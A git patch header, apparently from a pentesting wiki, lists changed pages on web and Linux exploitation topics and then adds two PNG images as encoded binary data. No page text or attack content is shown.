From 53db995b8672451eb87a7b5f7b258ef39f3a8c9b Mon Sep 17 00:00:00 2001 From: CPol Date: Fri, 8 Oct 2021 09:38:39 +0000 Subject: [PATCH] GitBook: [master] 10 pages and 4 assets modified --- ...2616e67655f696d672e706e67 (6) (4) (13).png | Bin 0 -> 1502 bytes .../{image (623).png => image (618) (2).png} | Bin .gitbook/assets/image (621) (1) (1).png | Bin 0 -> 24748 bytes .../linux-exploiting-basic-esp/README.md | 66 +++++++++--------- .../format-strings-template.md | 4 +- .../linux-privilege-escalation-checklist.md | 2 +- pentesting-methodology.md | 2 +- pentesting-web/cache-deception.md | 8 ++- .../xss-cross-site-scripting/README.md | 2 + pentesting-web/xxe-xee-xml-external-entity.md | 41 +++++++++++ pentesting/pentesting-web/graphql.md | 29 ++++---- .../active-directory-methodology/README.md | 2 +- .../checklist-windows-privilege-escalation.md | 2 +- 13 files changed, 99 insertions(+), 59 deletions(-) create mode 100644 .gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (13).png rename .gitbook/assets/{image (623).png => image (618) (2).png} (100%) create mode 100644 .gitbook/assets/image (621) (1) (1).png diff --git a/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (13).png b/.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (13).png new file mode 100644 index 0000000000000000000000000000000000000000..4c4968b48f0ebf20a73e46cd07c9315dc629c00c GIT binary patch literal 1502 zcmV<41tI#0P)O}P0RNd|v9YnQudnZ?9RH*M z|B+Y!p8)@kQ~!)n|BO%nn*jfdPXCHc|A|chiA(>8O82_ME`?B|ARvR zf5yUXqm38Abi#$x94+_wSpM&m`*Z*GIHFl|p&O65#5k%QvJu2Y>v!(8I?EcNQZGLg~u( zv^h#zNhUuw>eb0)vL$Kn+gBEP^N0JRA$h;q;whs#8mWb2qi#)Zd^(YIe>y^a`_XhX z1bp3CPTLQ1q7<>mM!huo?Bj`~dwZ`gP(S!{=Lo8#cziqP;&YNE9$6TOQawbVjh&S|SSUIvc>`V@ND4iwhrCk_rd{R$*KSDKnf*tjSm09Qp;n+!g0?1?l!iD*as#*m zFr7LB^JMV=6#Y%WKvZi0sN;YdB-H>h0fd!ib#wOK#gVr6$Edw(IV#l{6_k?7AaNsb`N5=vr;YmR}c{fmsWy|;K$fpN}4G(>rv z42{$o%6Za}h5iAO)k$-YYq97tA)A)DH({exg@A1k5z&s3zQ19N+4OBRM4YJ@&q-2wUkl| zQ7Qq`s?RddD%9J%W7OGKy0Ud`Zq-pzmy_em`J>Y5s zrqQenSPoR1HAcEk|vu zPWtV;;jDV=r|HVWGnr==Fl~~$x^9nEtwc|O>kLv`HJy~|I<2Z#9YLBt7*OANbZ_NE z9&1llYdKZOq+)$8>i)c{+FLnKee&Oe&VX0F z^gXB22=cwBo`^L@No`!x7+I(G+B!8Y*Qgb|HVyWF0T{|tnTG-h82|tP07*qoM6N<$ Ef}*3!D*ylh literal 0 HcmV?d00001 diff --git a/.gitbook/assets/image (623).png b/.gitbook/assets/image (618) (2).png similarity index 100% rename from .gitbook/assets/image (623).png rename to .gitbook/assets/image (618) (2).png diff --git a/.gitbook/assets/image (621) (1) (1).png b/.gitbook/assets/image (621) (1) (1).png new file mode 100644 index 0000000000000000000000000000000000000000..e2fc218f93b676924af7036ac432223c364206d5 GIT binary patch literal 24748 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 